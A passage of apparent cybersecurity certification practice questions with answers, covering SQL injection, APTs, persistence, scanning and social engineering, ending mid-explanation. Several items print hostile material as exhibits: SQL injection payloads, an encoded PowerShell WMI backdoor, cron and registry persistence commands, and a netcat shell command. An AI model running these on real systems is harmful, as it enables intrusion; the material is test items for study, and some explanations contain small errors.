C.Configure the thermostat to use a segregated part of the network by installing it into a DMZ

Explanation:
OBJ-2.5: The BEST options are to configure the thermostat to use the WPA2 encryption standard (if supported) and place any Internet of Things (IoT) devices into a DMZ to segregate them from the production network. While enabling two-factor authentication on the device’s website is a good practice, it will not increase the IoT device’s security. While disabling the wireless connectivity to the thermostat will ensure it cannot be hacked, it also will make the device ineffective for the customer’s normal operational needs. WEP is considered a weak encryption scheme, so you should use WPA2 over WEP whenever possible. Finally, upgrading the wireless access point’s firmware is good for security, but it isn’t specific to the IoT device’s security. Therefore, it is not one of the two BEST options.

45
Q

Which of the following is a common attack model of an APT attack?
A.Involves sophisticated DDoS Attacks
B.Quietly gathers information from compromised systems
C.Holds an organization's data hostage using encryption
D.Relies on worms to spread laterally

A

B.Quietly gathers information from compromised systems

Explanation:
OBJ-1.3: An APT refers to an adversary's ongoing ability to compromise network security by using various tools and techniques to obtain and maintain access. An APT is usually a highly sophisticated nation-state threat actor that quietly gathers information from compromised systems and can lie in wait for several months during an ongoing attack. In general, an APT is primarily focused on espionage and strategic advantage, but some target companies purely for commercial gain. An APT is unlikely to conduct a DDoS attack, use worms to spread throughout the network, or use ransomware as part of their covert attacks.

46
Q

You are analyzing the logs of a web server. Consider the following log sample:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
84.55.41.57 - - [14/Apr/2016:08:22:13 +0100] "GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=1 AND (SELECT 6810 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(6810=6810,1))),0x71707a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) HTTP/1.1" 200 166 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"
84.55.41.57 - - [14/Apr/2016:08:22:13 +0100] "GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=(SELECT 7505 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(7505=7505,1))),0x71707a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) HTTP/1.1" 200 166 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"
84.55.41.57 - - [14/Apr/2016:08:22:13 +0100] "GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=(SELECT CONCAT(0x7171787671,(SELECT (ELT(1399=1399,1))),0x71707a7871)) HTTP/1.1" 200 166 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"
84.55.41.57 - - [14/Apr/2016:08:22:27 +0100] "GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=1 UNION ALL SELECT CONCAT(0x7171787671,0x537653544175467a724f,0x71707a7871),NULL,NULL-- HTTP/1.1" 200 182 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on the logs above, which of the following type of attacks was conducted against this server?
A.SQL Injection
B.XML Injection
C.Cross-site scripting
D.Directory traversal
A

A.SQL Injection

Explanation:
OBJ-3.4: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1=1, or in this example, 6810=6810. In this case, the SQL injection is evidenced by the SQL statements being sent to the web application hosted by WordPress. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. The injection of unintended XML content and/or structures into an XML message can alter the application's intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser-side script, to a different end user. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files.

47
Q
A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the corporate office of the bank's dumpster. Based on this description, what portion of the penetration test is being conducted?
A.Active Information Gathering
B.Information reporting
C.Passive Information gathering
D.Vulnerability assessment
A

C.Passive Information gathering

Explanation:
OBJ-2.1: Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. In contrast, active information gathering starts to probe the organization using DNS enumeration, port scanning, and OS fingerprinting techniques. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

48
Q
Which of the protocols listed is NOT likely to trigger a vulnerability scan alert when used to support a virtual private network (VPN)?
A.SSLv2
B.PPTP
C.SSLv3
D.IPSec
A

D.IPSec

Explanation:
OBJ-2.2: IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

49
Q

You are analyzing the vulnerability scanning results from a recent web vulnerability scan in preparation for the exploitation phase of an upcoming assessment.
A portion of the scan results is shown below. Which exploit is the website vulnerable to based on the results?
A.Local file inclusion
B.Session hijacking
C.SQL Injection
D.Cookie manipulation

A

C.SQL Injection

Explanation:
OBJ-2.3: The most common type of code injection is SQL injection. An SQL injection attempts to modify one or more of an SQL query's four basic functions: select, insert, delete, or update. Two common methods of performing an SQL injection are either using a single apostrophe (') or submitting an always true statement like 1=1. In the scan results, you can see that a statement of "1 OR 17 - 7 = 10" was used. Notice that %20 is the ASCII encoded equivalent of the space character. As a penetration tester, you need to be familiar with common ASCII encoded text equivalents used in URLs like %20 (space), %5c (\), and %2F (/) to identify SQL injections and file inclusions.

50
Q
You are conducting a code review of a program and observe that the calculation 0xffffffff + 1 was attempted, but the result was returned as 0x00000000. Based on this, what type of exploit could be created against this program?
A.Password spraying
B.Impersonation
C.SQL Injection
D.Integer overflow attack
A

D.Integer overflow attack

Explanation:
OBJ-3.4: Integer overflows and other integer manipulation vulnerabilities frequently result in buffer overflows. An integer overflow occurs when an arithmetic operation results in a number too large to be stored in the space allocated for it. Integers are stored in 32 bits on the x86 architecture; therefore, if an integer operation results in a number greater than 0xffffffff, an integer overflow occurs, as was the case in this example. SQL injection is an attack that injects a database query into the input data directed at a server by accessing the application's client-side. Password spraying is a type of brute force attack in which multiple user accounts are tested with a dictionary of common passwords. Impersonation is the act of pretending to be another person or system for fraud.

51
Q

Sarah is conducting a penetration test against Dion Training’s Linux-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes?
A.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MONTHLY /mo 20 /ru SYSTEM
B.(crontab -l ; echo "*/20 * * * * /tmp/beacons.sh")| crontab -
C.(crontab -l ; echo "* */20 * * * /tmp/beacon.sh")| crontab -
D.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM

A

B.(crontab -l ; echo "*/20 * * * * /tmp/beacons.sh")| crontab -

Explanation:
OBJ-3.7: A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt for user interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Linux use the crontab command. The correct answer for this persistence is to enter the command (crontab -l ; echo "*/20 * * * * /tmp/beacon.sh")| crontab - which will run the script /tmp/beacon.sh every 20 minutes as the SYSTEM level user. The other variant of crontab is incorrect because it would run every 20 hours, not 20 minutes. The schtasks options are used in Windows, not in Linux.

52
Q

Sagar is planning to patch a production system to correct a detected vulnerability during his most recent network vulnerability scan. What process should he follow to minimize the risk of a system failure while patching this vulnerability?
A.Contact the vendor to determine a safe time frame for deploying the patch into the production environment
B.Deploy the patch in a sandbox environment to test it prior to patching the production system
C.Wait 60 days to deploy the patch to ensure there are no associated bugs reported with it
D.Deploy the patch immediately on the production system to remediate the vulnerability

A

B.Deploy the patch in a sandbox environment to test it prior to patching the production system

Explanation:
OBJ-5.3: While patching a system is necessary to remediate a vulnerability, you should always test the patch before implementation. It is considered a best practice to create a staging or sandbox environment to test the patches' installation before installing them into the production environment. This reduces the risk of the patch breaking something in the production system. Unless you are dealing with a very critical vulnerability and the risk of not patching is worse than the risk of patching the production system directly, you should not immediately patch the production systems without testing the patch first. You should not wait 60 days to deploy the patch. Waiting this long provides attackers an opportunity to reverse engineer the patch and create a working exploit against the vulnerability. Finally, asking the vendor for a safe time frame is not helpful since the vendor does not know the specifics of your environment or your business operations.

53
Q
Cybersecurity analysts are experiencing some issues with their vulnerability scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which of the following recommendations is LEAST likely to resolve this issue?
A.Reduce the sensitivity of scans
B.Reduce the frequency of scans
C.Reduce the scope of scans
D.Add another vulnerability scanner
A

A.Reduce the sensitivity of scans

Explanation:
OBJ-2.2: If the cybersecurity analyst were to reduce the scans’ sensitivity, it still would not decrease the time spent scanning the network and could alter the effectiveness of the results received. In this scenario, the scans, as currently scoped, are taking more than 24 hours to complete with the current resources. The analyst could reduce the scans’ scope, thereby scanning fewer systems or vulnerabilities signatures and taking less time to complete. Alternatively, the analyst could reduce the scans’ frequency by moving to a less frequent schedule, such as one scan every 48 hours or one scan per week. The final option would be to add additional vulnerability scanners to the process. This would allow the two scanners to work together to divide the workload and complete the task within the 24-hour scan frequency currently provided.

54
Q
Which of the following tools allows a penetration tester to quickly locate exploits in the Exploit Database archive?
A.Responder
B.Empire
C.Powersploit
D.Searchsploit
A

D.Searchsploit

Explanation:
OBJ-4.2: Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords.

55
Q
If you want to conduct an operating system identification during an nmap scan, which syntax should you utilize?
A.nmap -id
B.nmap -O
C.nmap -os
D.nmap -osscan
A

B.nmap -O

Explanation:
OBJ-4.1: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.

56
Q
You received an incident response report indicating a piece of malware was introduced into the company’s network through a remote workstation connected to the company’s servers over a VPN connection. Which of the following controls should be applied to prevent this type of incident from occurring again?
A.ACL
B.MAC Filtering
C.NAC
D.SPF
A

C.NAC

Explanation:
OBJ-5.3: Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then based on the results of those scans, either connect it to the company’s networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC Filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forging sender addresses during the email delivery.

57
Q

Which of the following is true concerning LM hashes?
A.LM hashes are based on AES128 cryptographic standard
B.LM hashes are not generated when the password length exceeds 15 characters
C.LM hashes consist of 48 hexadecimal characters
D.Uppercase characters in the password are converted to lowercase

A

B.LM hashes are not generated when the password length exceeds 15 characters

Explanation:
OBJ-3.4: LM hash, also known as LanMan hash or LAN Manager hash, is a compromised password hashing function. This was the primary hash that Microsoft LAN Manager and Microsoft Windows versions before Windows NT used to store user passwords. Support for the legacy LAN Manager protocol continued in later versions of Windows for backward compatibility. Still, it was recommended by Microsoft to be turned off by administrators due to the LM hash’s weak strength. LM hashes are not generated when the password length exceeds 15 characters since it is stored as a 16-byte value.

58
Q

You are working as part of a DevSecOps team at Dion Training on a new practice exam Android application. You need to conduct static analysis on the APK (Android PacKage) as part of your software assurance responsibilities. Which of the following tools should you utilize?
A.Decompile the DEX to a JAR file and then convert the JAR into Java
B.Convert the DEX to a JAR file and then decompile the JAR into Java
C.Convert the Java code in the APK to a JAR file and then cross-compile it to a DEX
D.Compile the APK into a JAR and then convert it into the DEX source code

A

B.Convert the DEX to a JAR file and then decompile the JAR into Java

Explanation:
OBJ-4.2: Android apps come packaged as APKs (Android PacKages). The APK contains all the application files, including the DEX file (Android bytecode/binary). To reverse the APK into source code to conduct a static analysis, you can convert the DEX file to a JAR (Java Archive) file. Then, you can decompile the JAR file into Java source code using a decompiler. While the specifics on how to do all of this are beyond the exam’s scope, you should understand the concepts and basic steps involved per the exam objectives.

59
Q

You are drafting the technical constraints for an upcoming penetration test. Which of the following would be a correct example of a technical constraint in a scoping document?
A.The legacy server may not be subjected to a DoS or buffer overflow attack during this engagement
B.All findings must be kept confidential and only shared with personnel listed in this agreement
C.Passive reconnaissance shall not be used during this engagement
D.Spearphishing of employees is not allowed during this engagement

A

A.The legacy server may not be subjected to a DoS or buffer overflow attack during this engagement

Explanation:
OBJ-1.1: A technical constraint is any item that is specifically excluded from the penetration test engagement. In general, these constraints will be technical in nature. For example, a legacy server may be considered too fragile to withstand denial of service or buffer overflow attacks. Other technical constraints may focus on the tools used based on the cost that would be involved. For example, it may be too costly to perform a USB key drop in the parking lot of a remote data center, so there may be a technical constraint to only allow remote attacks during the engagement.

60
Q
You are planning a penetration test against an organization. During your reconnaissance, you determined that they are using an embedded device to control their office's physical security. The device looks similar to a Raspberry Pi. Your goal in this engagement is to gain root access to this device using physical penetration testing techniques. Which of the following attacks should you utilize to gain root access?
A.Connect to the serial console
B.Credential brute forcing
C.JTAG debugging
D.Cold boot attack
A

C.JTAG debugging

Explanation:
OBJ-3.5: JTAG debugging is a troubleshooting methodology used by the manufacturer to test printed circuit boards and embedded systems. The circuit board of these systems has a JTAG connector that provides a simple and direct hardware interface that allows you to connect a computer directly to the board to communicate with its integrated chips. An experienced penetration tester can use this connection to communicate directly with the board to gain root access to the system.

61
Q

A coworker sent you the following PowerShell script to use during an upcoming engagement for Dion Training’s corporate network:

-=-=-=-=-=-
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null)
$StaticClass.Name = 'Win32_Backdoor'
$StaticClass.Put() | Out-Null
$StaticClass.Properties.Add('Code', "cmd /c start calc.exe & taskkill /f /im powershell.exe & waitfor persist & powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==")
$StaticClass.Put() | Out-Null
-=-=-=-=-=-

During the upcoming engagement, what should you use this script to perform?
A.Encrypting data
B.Collecting logs
C.Covering your tracks
D.Gaining persistence

A

D.Gaining persistence

Explanation:

OBJ-4.4: This short PowerShell script is used to gain persistence by creating a backdoor in a Windows system. Once this script is run on the system, it will create an MMC class with a backdoor. This code also launches the calculator (because it is meant to be benign for demonstration purposes) and then waits for an attacker’s system to connect to its backdoor.

62
Q
Dion Training requires that the staff simulate their response to a potential data breach. During this simulation, the staff gathers in the conference room and discusses each action they would take as part of their response. This information is then analyzed to ensure the company's data breach response playbook is up to date and would work properly when needed. Which of the following best describes what the staff did?
A.Disaster recovery planning
B.Business impact analysis
C.Incident response
D.Tabletop exercise
A

D.Tabletop exercise

Explanation:
OBJ-5.4: A tabletop exercise involves gathering the key staff of an organization and discussing their actions during a potential unwanted event. The staff could further be divided into a blue team and a red team, with half playing the role of defenders and the other half playing the adversary’s role. Tabletop exercises are less expensive to conduct than a full-scale red team event or penetration test. Tabletop exercises are a great way to exercise existing procedures and response plans to identify any weaknesses within them.

63
Q

A factory worker suspects that a legacy workstation is infected with malware. The workstation runs Windows XP and is used as part of an ICS/SCADA system to control industrial factory equipment. The workstation is connected to an isolated network that cannot reach the internet. The workstation receives the patterns for the manufactured designs through a USB drive. A technician is dispatched to remove the malware from this workstation. After its removal, the technician provides the factory worker with a new USB drive to move the pattern files to the workstation. Within a few days, the factory worker contacts the technician again to report the workstation appears to be reinfected with malware. Which of the following steps did the technician MOST likely forget to perform to prevent reinfection?

A.Identify and research malware symptoms
B.Update the anti-malware solution
C.Quarantine the infected system
D.Disable System Restore (in Windows)
E.Enable System Restore and create a restore point (in Windows)
F.Remediate the infected systems
A

B.Update the anti-malware solution

Explanation:
OBJ-2.5: Since the workstation is isolated from the internet, the anti-malware solution will need to be manually updated to ensure it has the latest virus definitions. Without the latest virus definitions, the system can easily become reinfected.

64
Q
What type of weakness is John the Ripper used to test during a technical assessment?
A.Usernames
B.Passwords
C.Firewall rulesets
D.File permissions
A

B.Passwords

Explanation:
OBJ-4.2: John the Ripper is a free, open-source password cracking software tool. It tests the strength of passwords during a technical assessment. John the Ripper supports both dictionary and brute force attacks.

65
Q

A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive?
A.A ‘HTTPS’ entry that indicates the web page is securely encrypted
B.A finding that shows the scanner compliance plug-ins are not up-to-date
C.A scan result showing a version that is different from the automated asset inventory
D.Items classified by the system as Low or as For Information Purposes Only

A

D.Items classified by the system as Low or as For Information Purposes Only

Explanation:
OBJ-2.3: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.

66
Q

A cybersecurity analyst is reviewing the logs for his company’s server and sees the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Process spawned by services.exe (c:\windows\system32\inetsrv\svchost.exe)
Process spawned by services.exe (c:\windows\system32\cmd.exe)
Command line (cmd /c start C:\WINDOWS\system32\wmiprvse.exe c:\WINDOWS\system32\ 2006)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this potential indicator of compromise (IoC), which of the following hypotheses should you make to begin threat hunting?
A.A common protocol is being used over a non-standard port
B.Unauthorized privileges are being utilized
C.Beaconing is establishing a connection to a C2 server
D.Data exfiltration is occurring over the network

A

B.Unauthorized privileges are being utilized

Explanation:
OBJ-3.5: This appears to be an indication that unauthorized privileges are being used. The first binary, svchost.exe, executes from an odd location, which indicates it might be malicious. The process svchost.exe doesn’t usually reside in the inetsrv folder in a Windows system since this folder contains the Windows IIS web server files. Additionally, this file then spawned a binary that appears to be masquerading as a Windows process, the WMI Provider Host called wmiprvse.exe. This appears to be the beginning of a privilege escalation attack. Based on the output above, there is no evidence that data is being exfiltrated or stolen from the network. Based on the output above, there is no evidence that any network protocol is currently used over a non-standard port. Finally, there is no evidence of beaconing or network activity in this output.

67
Q

You are reverse engineering a malware sample using the Strings tool when you notice the code inside appears to be obfuscated. You look at the following line of output on your screen:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ZWNobygiSmFzb24gRGlvbiBjcmVhdGVkIHRoaXMgQ29tcFRJQSBDeVNBKyBwcmFjdGljZSBleGFtIHF1ZXN0aW9uLiBJZiB5b3UgZm91bmQgdGhpcyBxdWVzdGlvbiBpbiBzb21lb25lIGVsc2UncyBjb3Vyc2UsIHRoZXkgc3RvbGUgaXQhIik7=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the output above, which of the following methods do you believe the attacker used to prevent their malicious code from being easily read or analyzed?
A.Base64
B.XML
C.SQL
D.QR coding
A

A.Base64

Explanation:
OBJ-3.4: While there are many different formats used by attackers to obfuscate their malicious code, Base64 is by far the most popular. If you see a string like the one above, you can decode it using an online Base64 decoder. In fact, I recommend you copy the string above and decode it to see how easy it is to reverse a standard Base64 encoded message. Some more advanced attackers will also use XOR and a key shift in combination with Base64 to encode the message and make it harder to decode, but using a tool like CyberChef can help you decode those. Structured Query Language (SQL) is used to communicate with a database. Extensible Markup Language (XML) is a markup language that defines a set of rules for encoding documents in a human-readable and machine-readable format. SQL and XML are not considered obfuscation techniques. A QR Code is a two-dimensional version of the barcode, known from product packaging in the supermarket. QR coding is the process of converting some data into a single QR code. QR coding might be considered a form of obfuscation, but it is not shown in this question’s example output.

68
Q

As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results?
A.An uncredentialed scan of the network was performed
B.The scanner failed to connect with the majority of workstations
C.The network has an exceptionally strong security posture
D.The scanner was not compatible with the devices on your network

A

A.An uncredentialed scan of the network was performed

Explanation:
OBJ-2.2: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network’s vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner had failed to connect to the workstations, an error would have been generated in the report.

69
Q
When you are managing a risk, what is considered an acceptable option?
A.Mitigate
B.Deny
C.Reject
D.Initiate
A

A.Mitigate

Explanation:
OBJ-5.1: Mitigating a risk makes the effect of a risk a little less unpleasant, harmful, or serious. The majority of risk management is focused on mitigating risks down to an acceptable level of loss or risk. The risk response actions are accept, avoid, mitigate, or transfer.

70
Q

During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true?
A.Nothing can be determined about this site with the information provided
B.You are scanning a CDN-hosted copy of the site
C.The server assumes you are conducting a DDoS attack
D.The scan will not produce any useful information

A

B.You are scanning a CDN-hosted copy of the site

Explanation:
OBJ-2.3: This result is due to the company using a distributed server model that hosts content on Edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provide high availability and performance by distributing the service spatially relative to end-users. The requested content may be served from the Edge server’s cache or pull the content from the main diontraining.com servers. If you are scanning a web server or application hosted with a CDN, you need to be aware that you might be scanning an edge copy of the site and not receive accurate results. While an edge server usually maintains static content, it is still useful to determine if any vulnerabilities exist in that portion of the site content. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting. While Akamai does provide excellent DDoS protection capabilities, nothing in this question indicates that the server is attempting to stop your scans or is assuming you are conducting a DDoS attack against it.

71
Q

An outside organization has completed a penetration test for a company. One of the report items reflects the ability to read SSL traffic from the webserver. What is the MOST likely mitigation for this reported item?
A.Configure the firewall to block traffic on port 443
B.Ensure the patches are deployed
C.Implement a VPN for employees
D.Install an IDS on the network

A

B.Ensure the patches are deployed

Explanation:
OBJ-5.3: A patch is designed to correct a known bug or fix a known vulnerability. In this case, the ability to read SSL traffic stems from a flaw in a piece of software on the web server, so deploying the available patches is the most likely mitigation.

72
Q

Matt is conducting a penetration test against Dion Training’s network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Matt enters the following command into the terminal:

-=-=-=-=-=-=-
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v beacon /d C:\Windows\Temp\beacon.bat
-=-=-=-=-=-=-

Which of the following types of persistence is Matt trying to utilize?
A.Registry startup
B.Scheduled task
C.Services
D.PS remoting
A

A.Registry startup

Explanation:
OBJ-3.7: A penetration tester can use the “reg add” command to cause a particular program or command to start every time the Windows machine is booted up. To achieve this, the penetration tester stores the program in the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry keys. The first one will cause the program to run whenever any user logs into the machine. The second will only cause the program to start when the victimized user logs in again.

73
Q

John is a cybersecurity consultant that wants to sell his services to an organization. In preparation for his first meeting with the client, John wants to conduct a vulnerability scan of their network to show the client how much they need his services. What is the most significant issue with John conducting this scan of the organization’s network?
A.The IP range of the client systems is unknown by John
B.John does not have permission to perform the scan
C.The client’s infrastructure design is unknown to John
D.John does not know what operating systems and applications are in use

A

B.John does not have permission to perform the scan

Explanation:
OBJ-1.2: All options listed are an issue, but the most significant issue is that John does not have the client’s permission to perform the scan. A vulnerability scan may be construed as a form of reconnaissance, penetration testing, or even an attack on the organization’s systems. A cybersecurity analyst should never conduct a vulnerability scan on another organization’s network without explicit written permission. In some countries, a vulnerability scan against an organization’s network without their permission is considered a cybercrime and could result in jail time for the consultant.

74
Q
What control provides the best protection against both SQL injection and cross-site scripting attacks?
A.CSRF
B.Input validation
C.Network layer firewalls
D.Hypervisors
A

B.Input validation

Explanation:
OBJ-5.3: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.

75
Q
You call up the CFO's assistant at an organization that is the target of your penetration test. You tell the assistant that you are an IRS agent and will be coming by this afternoon to meet with their boss. You ask the assistant for their email address so you can send them a PowerPoint to print out for the CFO to review before the meeting. When the assistant opens the PowerPoint, a warning pops up asking to enable Macros. You tell them to click accept and hurry because the CFO must get a copy of this before you arrive in 30 minutes. What type of social engineering principle are you using to exploit this organization?
A.Social proof
B.Scarcity
C.Authority
D.Trust
A

C.Authority

Explanation:
OBJ-3.1: Authority is used to take advantage of people’s willingness to act when directed to by someone with the power or right to give orders. For example, an attacker may pose as a police officer, government agent, or high-level executive to force an employee to take some form of action, whether it is ethically dubious or counter to their own interests.

76
Q
The Security Operations Center Director for Dion Training received a pop-up message on his workstation that said, “You will regret firing me; just wait until Christmas!” He suspects the message came from a disgruntled former employee who may have set up a piece of software to create this pop-up on his machine. The director is now concerned that other code might be lurking within the network that could negatively affect Christmas. He directs his team of cybersecurity analysts to begin searching the network for this suspicious code. What type of malware should they be searching for?
A.Worm
B.Logic bomb
C.Trojan
D.Adware
A

B.Logic bomb

Explanation:
OBJ-1.3: A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files should they ever be terminated from the company. The director is concerned that a logic bomb may have been created and installed on his system or across the network before the analyst was fired.

77
Q
Alex is conducting a penetration test of Dion Training's network. They just successfully exploited a host on the network with an IP address of 45.58.12.123. Then, they establish persistence using a netcat listener on it using port 52154. Which of the following commands would allow Alex to connect to the listener from his penetration testing machine?
A.nc -lp 52154 -e /bin/sh
B.nc 45.58.12.123 52154 /bin/sh
C.nc -lp 52154 /bin/sh
D.nc 45.58.12.123 52154 -e /bin/sh
A

D.nc 45.58.12.123 52154 -e /bin/sh

Explanation:
OBJ-3.7: Netcat (nc) is an open-source networking utility for debugging and investigating the network that can be used to create TCP/UDP connections and investigate them. It is extremely popular with penetration testers and attackers alike due to its multiple use cases. You should be familiar with setting up a listener and establishing a connection to the listener using netcat. Using the -lp option sets up a listener on the machine using the port specified (52154 in this scenario). To start the connection to the listener, you would enter “nc [IP address] [port] -e [shell]”, substituting the details for each parameter in each set of brackets.

78
Q

A cybersecurity analyst working at a major university is reviewing the SQL server log of completed transactions and notices the following entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"select ID, GRADE from GRADES where ID=1235235; UPDATE GRADES set GRADE='A' where ID=1235235;"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this transaction log, which of the following most likely occurred?
A.The SQL server has insufficient logging and monitoring
B.Someone used a SQL injection to assign straight A’s to the student with ID #1235235
C.The application and the SQL database are functioning properly
D.A student with ID #1235235 used a SQL injection to give themselves straight A’s

A

B.Someone used a SQL injection to assign straight A’s to the student with ID #1235235

Explanation:
OBJ-3.4: Based on this transaction log entry, it appears that the ID# field was not properly validated before being passed to the SQL server. This would allow someone to conduct an SQL injection and retrieve the student’s grades and set all of this student’s grades to an ‘A’ at the same time. It is common to look for a ‘1==1’ type condition to identify an SQL injection. There are other methods to conduct an SQL injection attack that could be utilized by an attacker. If input validation is not being performed on user-entered data, an attacker can exploit any SQL language aspect and inject SQL-specific commands. This entry is suspicious and indicates that either the application or the SQL database is not functioning properly. Still, there appears to be adequate logging and monitoring based on what we can see, and the question never indicates logging was an issue. An SQL database would not be designed to set ALL of a particular student’s grades to A’s, thus making this single entry suspicious. Most SQL statements in an SQL log will be fairly uniform and repetitive by nature when you review them. This leaves us with the question as to who performed this SQL injection. Per the question choices, it could be the student with ID# 1235235 or “someone.” While it seems as if student #1235235 had the most to gain from this, without further investigation, we cannot prove that it actually was student #1235235 that performed the SQL injection. Undoubtedly, student #1235235 should be a person of interest in any ensuing investigations, but additional information (i.e., whose credentials were being used, etc.) should be gathered before making any accusations. Therefore, the 